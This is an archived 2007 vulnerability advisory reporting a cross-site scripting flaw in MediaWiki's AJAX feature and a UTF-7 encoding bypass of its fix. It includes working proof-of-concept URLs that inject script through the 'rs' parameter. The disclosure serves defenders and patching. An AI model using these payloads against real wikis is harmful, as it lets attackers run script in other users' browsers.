|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
MediaWiki Cross-site Scripting
eyal
BugSec.com
Date: Mon Feb 19 2007 - 22:29:01 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
MediaWiki Cross-site Scripting
Vulnerabilities.
Date:
18/02/2007
Vendor:
MediaWiki
Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.
Description:
MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack by expliting the experimental AJAX features, if enabled (default). This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note: browsers encoding auto-detection has to be enabled for successful explitation.
Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions.
Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
v1.8.3 - v1.9.2
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D (URL Encoded)
Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]